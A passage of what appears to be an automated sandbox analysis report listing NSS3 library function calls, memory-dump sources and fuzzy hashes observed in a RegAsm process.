                                                                                                                                                                                                                                                                    • Part of subcall function 6C923090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C92317E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3167935723-0
                                                                                                                                                                                                                                                                  • Opcode ID: 668b1cc04f775aa82f00f94354f191c4c94d58f05955cff95df85d84db42d950
                                                                                                                                                                                                                                                                  • Instruction ID: 3f6d8022c5bccbeeec3d22a56e7366922719ce2404dd8791479064f37775c923
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 668b1cc04f775aa82f00f94354f191c4c94d58f05955cff95df85d84db42d950
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E61E871A00200ABEB109E75DC45FAB76BDFF24748F484028FE4A9AA56F735D818C7B0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PORT_ZAlloc_Util.NSS3(BDDF04CF), ref: 6C912C5D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970D30: calloc.MOZGLUE ref: 6C970D50
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970D30: TlsGetValue.KERNEL32 ref: 6C970D6D
                                                                                                                                                                                                                                                                  • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C912C8D
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C912CE0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C912CDA,?,00000000), ref: 6C912E1E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C912E33
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: TlsGetValue.KERNEL32 ref: 6C912E4E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: EnterCriticalSection.KERNEL32(?), ref: 6C912E5E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PL_HashTableLookup.NSS3(?), ref: 6C912E71
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PL_HashTableRemove.NSS3(?), ref: 6C912E84
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C912E96
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PR_Unlock.NSS3 ref: 6C912EA9
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C912D23
                                                                                                                                                                                                                                                                  • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C912D30
                                                                                                                                                                                                                                                                  • CERT_MakeCANickname.NSS3(00000001), ref: 6C912D3F
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C912D73
                                                                                                                                                                                                                                                                  • CERT_DestroyCertificate.NSS3(?), ref: 6C912DB8
                                                                                                                                                                                                                                                                  • free.MOZGLUE ref: 6C912DC8
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C913EC2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C913ED6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C913EEE
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C913F02
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: PL_FreeArenaPool.NSS3 ref: 6C913F14
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C913F27
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3941837925-0
                                                                                                                                                                                                                                                                  • Opcode ID: 23394742b1ddc3d8f0822e38784ed0dd63c1f938f99153aac0d1a5e9291d30d3
                                                                                                                                                                                                                                                                  • Instruction ID: 548fd1353db6b1ce2c53b5492ca9ef6042a47c869e22a28080b685b04bdbd353
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23394742b1ddc3d8f0822e38784ed0dd63c1f938f99153aac0d1a5e9291d30d3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F5103756187199BEB00EF25CC46B5B77E9EFA5308F15042CEC5583A50E731E815CB92
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9140D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C913F7F,?,00000055,?,?,6C911666,?,?), ref: 6C9140D9
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9140D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C911666,?,?), ref: 6C9140FC
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9140D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C911666,?,?), ref: 6C914138
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C917CFD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9BF0: TlsGetValue.KERNEL32(?,?,?,6CA20A75), ref: 6C9D9C07
                                                                                                                                                                                                                                                                  • SECITEM_ItemsAreEqual_Util.NSS3(?,6CA39030), ref: 6C917D1B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C911A3E,00000048,00000054), ref: 6C96FD56
                                                                                                                                                                                                                                                                  • SECITEM_ItemsAreEqual_Util.NSS3(?,6CA39048), ref: 6C917D2F
                                                                                                                                                                                                                                                                  • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C917D50
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C917D61
                                                                                                                                                                                                                                                                  • PORT_ArenaMark_Util.NSS3(?), ref: 6C917D7D
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C917D9C
                                                                                                                                                                                                                                                                  • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C917DB8
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C917E19
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C9738BD), ref: 6C973CBE
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C9738BD), ref: 6C973CD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: malloc.MOZGLUE(6C968D2D,?,00000000,?), ref: 6C970BF8
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: TlsGetValue.KERNEL32(6C968D2D,?,00000000,?), ref: 6C970C15
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C9738BD), ref: 6C973CF0
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CA4B369,000000FF,00000000,00000000,?,000000FF,00000000,00000000,6C9738BD), ref: 6C973D0B
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,6C9738BD), ref: 6C973D1A
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CA4B369,000000FF,00000000,00000000,00000000,6C9738BD), ref: 6C973D38
                                                                                                                                                                                                                                                                  • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6C973D47
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C973D62
                                                                                                                                                                                                                                                                  • free.MOZGLUE(000000FF,?,000000FF,00000000,00000000,6C9738BD), ref: 6C973D6F
                                                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
• Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$Alloc_Utilfree$Value_wfopenmalloc
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C89FD7A
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C89FD94
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C89FE3C
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C89FE83
                                                                                                                                                                                                                                                                    • Part of subcall function 6C89FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C89FEFA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C89FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C89FF3B
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C94ACE6
                                                                                                                                                                                                                                                                  • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C94AD14
                                                                                                                                                                                                                                                                  • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C94AD23
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA2D963
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(?,00000000), ref: 6C94AD39
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                                                                                                  • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(00000000,00000000,?,6C93124D,00000001), ref: 6C928D19
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C93124D,00000001), ref: 6C928D32
                                                                                                                                                                                                                                                                  • PL_ArenaRelease.NSS3(?,?,?,?,?,6C93124D,00000001), ref: 6C928D73
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C93124D,00000001), ref: 6C928D8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C93124D,00000001), ref: 6C928DBA
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                                                                  • String ID: KRAM$KRAM
                                                                                                                                                                                                                                                                  • API String ID: 2419422920-169145855
                                                                                                                                                                                                                                                                  • Opcode ID: 6398f6f674b4fd6186b6cf40cc4b60e89468192323376e338ecb98a9db47d224
                                                                                                                                                                                                                                                                  • Instruction ID: 38aedb47cde83a346c67db1be5bd393e97f4494c9c13d24cc567ba5ef7809047
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6398f6f674b4fd6186b6cf40cc4b60e89468192323376e338ecb98a9db47d224
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C2191B6A147018FCB08EF38C48456AB7F4FF55308F15896AD9C887709D738D846CB95
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9E4DC3
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9E4DE0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • misuse, xrefs: 6C9E4DD5
                                                                                                                                                                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C9E4DDA
                                                                                                                                                                                                                                                                  • invalid, xrefs: 6C9E4DB8
                                                                                                                                                                                                                                                                  • API call with %s database connection pointer, xrefs: 6C9E4DBD
                                                                                                                                                                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9E4DCB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: sqlite3_log
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                                  • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                                  • Opcode ID: 475650e4ddd1eab8da8279cf870205f30ff1cdceac272b9be6f78a0a36811b57
                                                                                                                                                                                                                                                                  • Instruction ID: c55416ed1610a9e98a11b27a736fb8ce22e803ff49aca6a9a5afad26c9cedbfa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 475650e4ddd1eab8da8279cf870205f30ff1cdceac272b9be6f78a0a36811b57
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32F0B421F146647FDB024195CD11F8637AD6F29319F4649E0EE046BA52E215F8D096A1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000,6C951444,?,00000001,?,00000000,00000000,?,?,6C951444,?,?,00000000,?,?), ref: 6C950CB3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?,?,6C951444,?), ref: 6C950DC1
                                                                                                                                                                                                                                                                  • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?,?,6C951444,?), ref: 6C950DEC
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C912AF5,?,?,?,?,?,6C910A1B,00000000), ref: 6C970F1A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970F10: malloc.MOZGLUE(00000001), ref: 6C970F30
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C970F42
                                                                                                                                                                                                                                                                  • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?), ref: 6C950DFF
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C951444,?,00000001,?,00000000), ref: 6C950E16
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?), ref: 6C950E53
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3(?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?,?,6C951444,?,?,00000000), ref: 6C950E65
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?), ref: 6C950E79
                                                                                                                                                                                                                                                                    • Part of subcall function 6C961560: TlsGetValue.KERNEL32(00000000,?,6C930844,?), ref: 6C96157A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C961560: EnterCriticalSection.KERNEL32(?,?,?,6C930844,?), ref: 6C96158F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C961560: PR_Unlock.NSS3(?,?,?,?,6C930844,?), ref: 6C9615B2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C931397,00000000,?,6C92CF93,5B5F5EC0,00000000,?,6C931397,?), ref: 6C92B1CB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92B1A0: free.MOZGLUE(5B5F5EC0,?,6C92CF93,5B5F5EC0,00000000,?,6C931397,?), ref: 6C92B1D2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9289E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C9288AE,-00000008), ref: 6C928A04
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9289E0: EnterCriticalSection.KERNEL32(?), ref: 6C928A15
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9289E0: memset.VCRUNTIME140(6C9288AE,00000000,00000132), ref: 6C928A27
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9289E0: PR_Unlock.NSS3(?), ref: 6C928A35
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1601681851-0
                                                                                                                                                                                                                                                                  • Opcode ID: ced1eb6228c19fc65b7f57754a1cf9e45fcb0e62ed118e2b7732649c44a3033e
                                                                                                                                                                                                                                                                  • Instruction ID: cf2f777c39854f09cefe5958d308de5723f59690eff178c086f75dd6d10b353b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ced1eb6228c19fc65b7f57754a1cf9e45fcb0e62ed118e2b7732649c44a3033e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5751BAB6E002115FEB00DF64EC41ABB37ACEF6521CF555024EC0997B12F735ED2986A2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C928850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C930715), ref: 6C928859
                                                                                                                                                                                                                                                                    • Part of subcall function 6C928850: PR_NewLock.NSS3 ref: 6C928874
                                                                                                                                                                                                                                                                    • Part of subcall function 6C928850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C92888D
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3 ref: 6C929CAD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D98D0: calloc.MOZGLUE(00000001,00000084,6C900936,00000001,?,6C90102C), ref: 6C9D98E5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007AD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007CD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007D6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C89204A), ref: 6C9007E4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,6C89204A), ref: 6C900864
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C900880
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,6C89204A), ref: 6C9008CB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008D7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008FB
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C929CE8
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,6C92ECEC,6C932FCD,00000000,?,6C932FCD,?), ref: 6C929D01
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,6C92ECEC,6C932FCD,00000000,?,6C932FCD,?), ref: 6C929D38
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,6C92ECEC,6C932FCD,00000000,?,6C932FCD,?), ref: 6C929D4D
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C929D70
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C929DC3
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3 ref: 6C929DDD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9288D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C930725,00000000,00000058), ref: 6C928906
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9288D0: EnterCriticalSection.KERNEL32(?), ref: 6C92891A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9288D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C92894A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9288D0: calloc.MOZGLUE(00000001,6C93072D,00000000,00000000,00000000,?,6C930725,00000000,00000058), ref: 6C928959
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9288D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C928993
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9288D0: PR_Unlock.NSS3(?), ref: 6C9289AF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3394263606-0
                                                                                                                                                                                                                                                                  • Opcode ID: c814b57cdab89d3837f830ede82037ae697f8be5699d612b0f73810452a44c45
